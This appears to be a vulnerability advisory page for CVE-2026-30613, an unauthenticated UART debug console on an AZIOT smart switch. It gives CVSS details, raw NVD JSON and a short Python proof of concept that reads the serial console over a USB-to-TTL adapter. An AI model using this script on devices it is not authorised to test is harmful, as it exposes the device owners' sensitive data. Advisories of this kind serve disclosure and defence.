Security Vulnerability Report
CVE-2026-30613 CVSS 4.6 MEDIUM

CVE-2026-30613

Published: 2026-04-06 18:16:41
Last Modified: 2026-04-07 15:17:38

Description

An information disclosure vulnerability exists in AZIOT 1 Node Smart Switch (16amp)- WiFi/Bluetooth Enabled Software Version: 1.1.9 due to improper access control on the UART debug interface. An attacker with physical access can connect to the UART interface and obtain sensitive information from the serial console without authentication.

CVSS Details

CVSS Score: 4.6
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

AZIOT 1 Node Smart Switch (16amp) Software Version 1.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-30613: UART Information Disclosure
# This script demonstrates how to read data from an unauthenticated UART interface.
# Requires physical access and a USB-to-TTL adapter.
import serial
import time

def read_uart_data(port='/dev/ttyUSB0', baud_rate=115200):
    try:
        # Configure serial connection (Adjust baud rate as per device spec)
        ser = serial.Serial(port, baud_rate, timeout=1)
        print(f"[+] Connected to {port} at {baud_rate} baud.")
        print("[+] Reading data stream (Press Ctrl+C to stop)...")
        while True:
            if ser.in_waiting > 0:
                # Read and decode sensitive data from serial console
                data = ser.readline().decode('utf-8', errors='ignore').strip()
                if data:
                    print(data)
            time.sleep(0.1)
    except serial.SerialException as e:
        print(f"[-] Serial Error: {e}")
    except KeyboardInterrupt:
        print("\n[!] Exiting...")
    finally:
        if 'ser' in locals() and ser.is_open:
            ser.close()

if __name__ == "__main__":
    # Usage: python3 poc.py
    read_uart_data()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30613", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:41.440", "lastModified": "2026-04-07T15:17:38.420", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An information disclosure vulnerability exists in AZIOT 1 Node Smart Switch (16amp)- WiFi/Bluetooth Enabled Software Version: 1.1.9 due to improper access control on the UART debug interface. An attacker with physical access can connect to the UART interface and obtain sensitive information from the serial console without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-200"}]}], "references": [{"url": "http://aziot.com", "source": "[email protected]"}, {"url": "https://github.com/dumbermore/tuya/blob/main/README.md", "source": "[email protected]"}]}}